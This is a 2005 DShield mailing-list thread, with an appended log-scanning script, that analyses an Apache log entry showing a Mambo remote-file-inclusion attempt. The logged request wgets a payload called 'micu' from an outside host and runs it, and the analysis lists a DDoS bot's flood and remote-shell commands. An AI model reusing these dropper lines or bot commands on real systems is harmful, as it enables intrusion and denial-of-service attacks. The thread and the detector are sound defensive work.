[Dshield] Can Someone Decipher This Log Entry?

Joel Esler eslerj at gmail.com
Thu Dec 22 12:41:37 GMT 2005


Stephanie -- Excellent Analysis.

Short end of the stick...  I've seen tons of these hit my machine  
lately, and I usually download the code and let it connect just for  
fun..  (oh yeah, then I tell #dshield about it in irc.freenode.net  
and it usually gets shut down post haste)

It's an IRC connector/remote shell client thingy (I know that's  
technical) for botnet usage.  I have about 4 different types on my  
machine in a folder called "fun".

Joel


On Dec 22, 2005, at 5:30 AM, Stephane Grobety wrote:

> Hello David,
>
> I've masked part of the IP you provided in your message, just in
> case. It's a bit silly considering you didn't do the same, but,
> well, it does no additional harm...
>
> It looks like this is an attempt to exploit a flaw in the Mambo
> content management software (looks like it's this one:
> http://secunia.com/advisories/14337/).
>
> If the exploit succeeds, it will try to wget a file called "micu" from
> XXX.136.48.69 into the /tmp folder and execute it.
>
> At this moment, that server is still serving the file so I checked it.
> What it does is try to download and execute two more files: "mare"  
> and "ro"
>
> "mare" isn't available on the remote server but "ro" is. It looks like
> an ELF executable. Now, I'm not a specialist of that file format so
> I may be completely wrong here but this looks like a Linux x86
> executable file. It seems to link the /lib/ld-linux.so.2 library and
> import a bunch of functions that you expect from an IP server program.
> It also contains a number of strings that indicate that it might try
> to contact an IRC server (*.undernet.org). It also has a nice internal
> help that is probably intended to be used by the attacker:
>
> NOTICE %s :Current status is: %s.
> NOTICE %s :Already disabled.
> NOTICE %s :Password too long! > 254
> NOTICE %s :Disable sucessful.
> NOTICE %s :ENABLE <pass>
> NOTICE %s :Already enabled.
> NOTICE %s :Wrong password
> NOTICE %s :Password correct.
> NOTICE %s :Removed all spoofs
> NOTICE %s :What kind of subnet address is that? Do something like: 169.40
> NOTICE %s :Unable to resolve %s
> NOTICE %s :UDP <target> <port> <secs>
> NOTICE %s :Packeting %s.
> NOTICE %s :PAN <target> <port> <secs>
> NOTICE %s :Panning %s.
> NOTICE %s :TSUNAMI <target> <secs>
> NOTICE %s :Tsunami heading for %s.
> NOTICE %s :UNKNOWN <target> <secs>
> NOTICE %s :Unknowning %s.
> NOTICE %s :MOVE <server>
> NOTICE %s :TSUNAMI <target> <secs>                          = Special packeter that wont be blocked by most firewalls
> NOTICE %s :PAN <target> <port> <secs>                       = An advanced syn flooder that will kill most network drivers
> NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder
> NOTICE %s :UNKNOWN <target> <secs>                          = Another non-spoof udp flooder
> NOTICE %s :NICK <nick>                                      = Changes the nick of the client
> NOTICE %s :SERVER <server>                                  = Changes servers
> NOTICE %s :GETSPOOFS                                        = Gets the current spoofing
> NOTICE %s :SPOOFS <subnet>                                  = Changes spoofing to a subnet
> NOTICE %s :DISABLE                                          = Disables all packeting from this client
> NOTICE %s :ENABLE                                           = Enables all packeting from this client
> NOTICE %s :KILL                                             = Kills the client
> NOTICE %s :GET <http address> <save as>                     = Downloads a file off the web and saves it onto the hd
> NOTICE %s :VERSION                                          = Requests version of client
> NOTICE %s :KILLALL                                          = Kills all current packeting
> NOTICE %s :HELP                                             = Displays this
> NOTICE %s :IRC <command>                                    = Sends this command to the server
> NOTICE %s :SH <command>                                     = Executes a command
> NOTICE %s :Killing pid %d.
>
> So what this looks like is a client for a DDoS botnet.
>
> Other entries in the program seem to indicate it's been compiled on a
> Debian system:
>
> /home/drow/debian-glibc/
>
> There is also something that looks very much like an HTTP request:
>
> GET /%s HTTP/1.0
> Connection: Keep-Alive
> User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
> Host: %s:80
> Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
> Accept-Encoding: gzip
> Accept-Language: en
> Accept-Charset: iso-8859-1,*,utf-8
>
> It would be interesting to see if the request matches your log entry:
> I think the above request is part of the exploit code.
>
> I did a bit of google research and found several DDoS clients that are
> apparently based on the same code that contains the same string
> literals.
>
> That's all I can say about this... The attacker is still up and
> running and probably still scanning networks trying to drop its
> malware.
>
> Good luck,
> Stephane
>
>
> Wednesday, December 21, 2005, 10:53:14 PM, you wrote:
>
> DCH> I have about 25 of these today. I've added index2.php to the firewall watcher.
> DCH> I cannot make sense of this Apache print:
>
> DCH> 85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://XXX.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20XXX.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"
>
> -- 
> Best regards,
>  Stephane                            mailto:security at admin.fulgan.com

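A defender's way to pick this pattern out of Apache access logs, as an added example that is not part of the original thread: it parses the common-log request line, decodes the query on its own (so the `;` in the shell chain is not treated as a separator), and flags a Mambo config parameter that points off-host together with a fetch/chmod/execute chain. The two sample lines are constructed from the entry David posted, with the payload host masked as in the thread; the function and variable names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample: the index2.php RFI attempt from the thread (payload host
# masked as in the thread), followed by one benign request to the same page.
SAMPLE_LOG = r'''85.190.1.171 - - [21/Dec/2005:16:47:41 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://XXX.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20XXX.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|  HTTP\x01.1" 200 21 "-"
10.0.0.5 - - [21/Dec/2005:16:50:02 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1 HTTP/1.1" 200 4311 "-"'''

# Apache common log format: client, identd, user, [timestamp], "request", status, size.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+')
# A parameter value that is itself a URL on another host (remote file inclusion).
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://([^/?#:]+)', re.I)
# Download-then-execute chain: a fetch tool, a chmod and a ./ invocation in one value.
DROPPER_RE = re.compile(r'\b(wget|curl|fetch|lynx)\b.*\bchmod\b.*\./', re.S)
FETCH_HOST_RE = re.compile(r'(?:wget|curl|fetch|lynx)\s+(?:\S+://)?([^/\s]+)')

def parse_query(target):
    """Split the query string on '&' only and percent-decode keys and values."""
    query = target.partition('?')[2]
    pairs = []
    for part in query.split('&'):
        key, _, value = part.partition('=')
        pairs.append((unquote(key), unquote(value)))
    return pairs

def analyze_line(line):
    """Return a finding dict for an RFI plus dropper attempt, or None if benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = m.group('req').split()
    if len(parts) < 2:
        return None
    finding = {'ip': m.group('ip'), 'ts': m.group('ts'),
               'rfi': [], 'dropper_hosts': [], 'shell': None}
    for key, value in parse_query(parts[1]):
        url = REMOTE_URL_RE.match(value)
        if url:  # config path pointing off-host: the include that runs cmd.gif
            finding['rfi'].append((key, url.group(2)))
        if DROPPER_RE.search(value):
            finding['shell'] = value
            # hosts the victim would be told to fetch the payload ("micu") from
            finding['dropper_hosts'] = FETCH_HOST_RE.findall(value)
    return finding if (finding['rfi'] or finding['shell']) else None

def scan_log(text):
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

The `dropper_hosts` and `rfi` fields are what you would feed a firewall watcher or abuse report; the decoded `shell` value is what the Mambo host would have executed had the include succeeded.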

